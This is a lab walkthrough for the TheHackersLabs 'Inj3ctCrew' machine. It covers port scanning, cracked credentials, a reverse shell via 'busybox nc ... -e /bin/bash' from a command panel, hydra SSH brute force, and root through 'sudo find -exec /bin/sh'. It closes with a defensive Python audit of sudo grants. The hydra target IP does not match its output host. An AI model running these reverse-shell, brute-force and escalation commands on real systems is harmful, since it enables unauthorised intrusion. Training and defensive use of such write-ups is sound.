Inj3ctCrew

Target machine: https://labs.thehackerslabs.com/machine/161

Information gathering

192.168.100.66

Port scan

root@LAPTOP-O235O5EH [~/Desktop/test] ➜  rustscan -a 192.168.100.66                                          [19:33:10]
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog :
: https://github.com/RustScan/RustScan :
--------------------------------------
You miss 100% of the ports you don't scan. - RustScan

[~] The config file is expected to be at "/root/.rustscan.toml"
[~] File limit higher than batch size. Can increase speed by increasing batch size '-b 10140'.
Open 192.168.100.66:22
Open 192.168.100.66:80
[~] Starting Script(s)
[~] Starting Nmap 7.95 ( https://nmap.org ) at 2026-01-22 19:33 CST
Initiating ARP Ping Scan at 19:33
Scanning 192.168.100.66 [1 port]
Completed ARP Ping Scan at 19:33, 0.04s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 19:33
Completed Parallel DNS resolution of 1 host. at 19:33, 6.54s elapsed
DNS resolution of 1 IPs took 6.54s. Mode: Async [#: 2, OK: 0, NX: 1, DR: 0, SF: 0, TR: 3, CN: 0]
Initiating SYN Stealth Scan at 19:33
Scanning 192.168.100.66 [2 ports]
Discovered open port 22/tcp on 192.168.100.66
Discovered open port 80/tcp on 192.168.100.66
Completed SYN Stealth Scan at 19:33, 0.02s elapsed (2 total ports)
Nmap scan report for 192.168.100.66
Host is up, received arp-response (0.00046s latency).
Scanned at 2026-01-22 19:33:25 CST for 0s

PORT STATE SERVICE REASON
22/tcp open ssh syn-ack ttl 64
80/tcp open http syn-ack ttl 64
MAC Address: 08:00:27:03:0C:CB (PCS Systemtechnik/Oracle VirtualBox virtual NIC)

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 6.68 seconds
Raw packets sent: 3 (116B) | Rcvd: 3 (116B)

Port 80/tcp scan

There is a backup file; open it and view the source code.

It says the important information is in PwnedCredentials.html.

Visiting that page yields user credentials.

The password is stored as an MD5 hash, however, and needs to be cracked.

https://www.cmd5.com/default.aspx

Admin:qwerty

Log in at /login.php.

It is a command-execution panel with no input filtering.

www shell

Since commands can be executed, get a reverse shell directly.

busybox nc 192.168.100.31 7777 -e /bin/bash

Privilege escalation

www -> nolen11

User enumeration

cat /etc/passwd | grep "home"

SSH brute force

Brute-force nolen11 with hydra.

hydra -l nolen11 -P /usr/share/wordlists/rockyou.txt ssh://192.168.100.31
[22][ssh] host: 10.0.2.10   login: nolen11   password: 987654321

nolen11:987654321

nolen11 -> root

nolen11@TheHackersLabs-Inj3ctCrew:/home$ sudo -l
Matching Defaults entries for nolen11 on TheHackersLabs-Inj3ctCrew:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty

User nolen11 may run the following commands on TheHackersLabs-Inj3ctCrew:
(ALL) NOPASSWD: /usr/bin/find

This means /usr/bin/find can be run as any user (including root) without a password.

GTFOBins has a ready-made entry for this.

https://gtfobins.org/gtfobins/find/

nolen11@TheHackersLabs-Inj3ctCrew:/home$ sudo /usr/bin/find . -exec /bin/sh -p \; -quit
# whoami
root
#
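As a defender-side check added here (not part of the original writeup), the following Python audits `sudo -l` output for the misconfiguration found above: a password-less grant, as root, of a binary whose own options run other programs. The sample text is constructed from the output shown above plus one extra entry, and the SHELL_CAPABLE set is an assumption seeded only with the binary this page demonstrates.

```python
import os
import re

# Constructed sample: based on the `sudo -l` output in the writeup above,
# plus one extra constructed grant so a lower-risk case is visible too.
SAMPLE_SUDO_L = """\
Matching Defaults entries for nolen11 on TheHackersLabs-Inj3ctCrew:
    env_reset, mail_badpass, use_pty

User nolen11 may run the following commands on TheHackersLabs-Inj3ctCrew:
    (ALL) NOPASSWD: /usr/bin/find
    (root) /usr/bin/systemctl restart apache2
"""

# Binaries whose own options execute other programs, so a sudo grant on them
# is a root shell in disguise. `find` (its -exec action) is the one shown in
# this writeup; extend the set from the GTFOBins list linked above as needed.
SHELL_CAPABLE = {"find"}

# Per-grant line format of `sudo -l`: "(runas) TAG: TAG: cmd, cmd".
ENTRY_RE = re.compile(
    r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>\S.*)$")


def parse_sudo_l(text):
    """Yield (runas_user, tags, [commands]) for each grant line."""
    in_commands = False
    for line in text.splitlines():
        if line.startswith("User ") and "may run" in line:
            in_commands = True  # grant lines follow this header
            continue
        m = ENTRY_RE.match(line) if in_commands else None
        if not m:
            continue
        runas = m.group("runas").split(":")[0].strip()  # "ALL : ALL" -> "ALL"
        tags = set(re.findall(r"[A-Z]+", m.group("tags")))
        cmds = [c.strip() for c in m.group("cmds").split(",") if c.strip()]
        yield runas, tags, cmds


def audit_sudo_l(text):
    """Return (command, risk_reasons) per grant; all three reasons together
    are the combination this writeup escalates through."""
    findings = []
    for runas, tags, cmds in parse_sudo_l(text):
        for cmd in cmds:
            binary = os.path.basename(cmd.split()[0])
            reasons = []
            if "NOPASSWD" in tags:
                reasons.append("no password required")
            if runas in ("ALL", "root"):
                reasons.append("runs as root")
            if binary in SHELL_CAPABLE:
                reasons.append("binary can run arbitrary commands")
            findings.append((cmd, reasons))
    return findings
```

Feed it the saved output of `sudo -l` for each account during a host review; any grant that collects all three reasons should be removed or replaced by a wrapper script with fixed arguments.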